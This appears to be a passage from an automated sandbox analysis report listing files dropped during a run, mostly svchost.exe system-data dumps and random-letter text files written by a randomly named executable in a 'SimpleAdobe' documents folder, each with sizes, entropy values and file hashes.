                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):103944
                                          Entropy (8bit):3.0153167025435663
                                          Encrypted:false
                                          SSDEEP:3072:7Yz5Iy30srwnGIeblJWPj+YJvVCf41tS9KKai+0+C+y+d+S+Z+4+bn+O+w8+CvBz:u
                                          MD5:3ACEF517D45E9461EFA01635DF714120
                                          SHA1:47FC91732EECED86A7BA9FF87A77D18529AE0845
                                          SHA-256:8EFC80632700084FB3AFE1C3FF826D8BD83D3F7B969D883D8412E4884CC760FB
                                          SHA-512:ED6072E35EF5846380050C70A385A463B0419638C64BF61481788F3DF406E5AF826EBBF2F093C7FE1D6106178CE5D3106BDC2210EAF55342124B177C2234EDA9
                                          Malicious:false
                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):13340
                                          Entropy (8bit):2.6946476540667743
                                          Encrypted:false
                                          SSDEEP:96:TiZYW9CJMRl4lYOY+WRudcHhYEZSBHltFid3kySwoZl9aNalKlYMH0BI0N3F:2ZD9Ckqpmu9n79maAlYMH0++3F
                                          MD5:75D593D669C982FC2AD54D1EB964B6C2
                                          SHA1:2939143B1ED608B4E5EFC012868C321D036330E1
                                          SHA-256:A8FFE785A20C3323E52F39AF548D76B71087FB589E2C140172C2D7DFDF20694F
                                          SHA-512:C4851DE25295DA02E4D0952818FE2C61FF7CC3E6142DE215F9CB9C4F87CAE7A449E4B30591B6D8759DBE6A62594A0F704A5402BD9A72AC406DF9E86B4D5BE713
                                          Malicious:false
                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):102256
                                          Entropy (8bit):3.0156700393207942
                                          Encrypted:false
                                          SSDEEP:3072:2ZI66Eg8w7bouUPCc4Vo0IIC8YQaU+Z+us+M+A+v+Q+e+2+L++s+Xv2vbk+o+z+d:L
                                          MD5:000B2F0879E3CDB35DAA7F560BB97D99
                                          SHA1:E056B0E65C3D1A564CF75B8F3D62008CF7E52477
                                          SHA-256:B38F5B17119B074E000FF03690474012E78FD69C6401DEF6F5F8288C696229E2
                                          SHA-512:72B405465142A6324E856B435059CE5A2C184B1FD0DEE0D6E1D7B175B55228DECDAEF9C4EBA599FC0CC1B2452E2B21E4BD4780C1A2BA0FE2A3EA802C96434FDD
                                          Malicious:false
                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):13340
                                          Entropy (8bit):2.6946477161129407
                                          Encrypted:false
                                          SSDEEP:96:TiZYW9mxzTy6YvYrWLGPHmYEZSHvBtFiz3eyrw8WVT+mDNaSlzME0YKI73F:2ZD9m4pGhBwmBaSlzME0Q73F
                                          MD5:6C0FF9B38771E0B5D6CBA0F4FEE66E90
                                          SHA1:94AAA549550B25B714770E69714C577F76E3634A
                                          SHA-256:DCDBAFB2F5F3C04A3760BC523B79A3FB091A9A6274FE9252B7E9524F5679B02E
                                          SHA-512:01E1F05EC5F29E19F9DAEA75603C33B9357C3449961678C4FD2C429BD31E07C914E97691EC989A178B2AFE6F43976811BAB9D08C97898DFEC7FF53B6907ED9E3
                                          Malicious:false
                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):87150
                                          Entropy (8bit):3.0232733489976296
                                          Encrypted:false
                                          SSDEEP:1536:X8COrXLqPxoP/+oG+ZGBXE7ca4+G+C+M+Me+W+f+6+C+j+qQ+Gviv0A+D+Q+p+C8:X8COrXLqPxoP/+oG+ZGBXE7ca4+G+C+u
                                          MD5:3BC92A1A377986916FC904C3079AC5D0
                                          SHA1:D0EE703809A639FF77FB25A3912A973FA5CBEDCD
                                          SHA-256:26D3262A27A6EF2FD338A35BA7B2AA5CEFCF46A90A18CFBBE13DFA86B9001DDF
                                          SHA-512:E815AEA9ACAC12F74E83EEAB878497268EA63A54EE22C9C51C2930C29D5019CC8EEAF62665357485D87996EA4C912A3703B0CD4F20CF56CB3A6D1AD845123E1A
                                          Malicious:false
                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):13340
                                          Entropy (8bit):2.697306470565094
                                          Encrypted:false
                                          SSDEEP:96:TiZYWFpbAmDYhYeSBGHOYEZzetriMMYyvwnJYYjaxleMo0KIf3F:2ZDLmgB+JDaxleMo09f3F
                                          MD5:2612CD0808DC5770FF36FF51BD209D61
                                          SHA1:9B06991D875868BE93589D4CF3DA305EC206D992
                                          SHA-256:797B3DE5D8C6CFA9E6D6FCA355DA11F931023B8BFF2B202C60233E64349A258D
                                          SHA-512:7E96914E73E132470E4608BB981AF08C79904B6CCD8E2480FBCD16422E6D59DB4BF07AB313A1B11EFA1CE176C209342EEBBDA4EA3E3D7807E9CE0F3D4BDDBCC2
                                          Malicious:false
                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):88160
                                          Entropy (8bit):3.025773900052158
                                          Encrypted:false
                                          SSDEEP:1536:I4I/RXaaY/PxZzq+3kXp7x1a4+G+C+M+Me+W+f+6+C+j+qQ+Gviv0A+D+Q+p+C+V:I4I/RXaaY/PxZzq+3kXp7x1a4+G+C+MZ
                                          MD5:A7959A56F68C807C3BE0F885E1A1821B
                                          SHA1:2E159FFF3B84D3E6A7AB70F386CB54C6C5A8AB63
                                          SHA-256:5A6B2FC583A2F97156A76CBDE19076F75CDD5FF49060EEEF30EF3D72CFD1B92B
                                          SHA-512:1D2344C709D70F5F542682B02ADF6258623E56AE1F97EEBB2391036FBAE5DB43FA6A5DB0020E6CB0BA3CC460886BF1CA558291A1A08B8A0BC343385EE171F2E6
                                          Malicious:false
                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):13340
                                          Entropy (8bit):2.6968869534776503
                                          Encrypted:false
                                          SSDEEP:96:TiZYWKndbQYbY0SNYH/YEZHttrieMnylwqazJaKlLDM4a0UIeR3F:2ZD7sbneaKlLDM4a0Du3F
                                          MD5:541CBB2455A2985F99B85FDBDD62C461
                                          SHA1:8E2040F607868CDEB6D65454C4C06A360BCA606B
                                          SHA-256:5C28B4C46120AD14588B07C440D32B62952A2D6BC5F19A4226796E941C5125EE
                                          SHA-512:F505521292779C81C681E1B01A2625FC2CCCD0EDB387752091A9924C9D3430DB3CB04813B53C07BD69FFC99F5B92B924523046A5270E4E9A73A38FA66798AEEC
                                          Malicious:false
                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.696508269038202
                                          Encrypted:false
                                          SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                          MD5:0E9E92228B27AD7E7B4449467A529B0C
                                          SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                          SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                          SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                          Malicious:false
                                          Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.696508269038202
                                          Encrypted:false
                                          SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                          MD5:0E9E92228B27AD7E7B4449467A529B0C
                                          SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                          SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                          SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                          Malicious:false
                                          Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.698999446679606
                                          Encrypted:false
                                          SSDEEP:24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
                                          MD5:73351F70BFEF33BEEA9E1CC192801D02
                                          SHA1:ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
                                          SHA-256:F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
                                          SHA-512:56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
                                          Malicious:false
                                          Preview:UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUX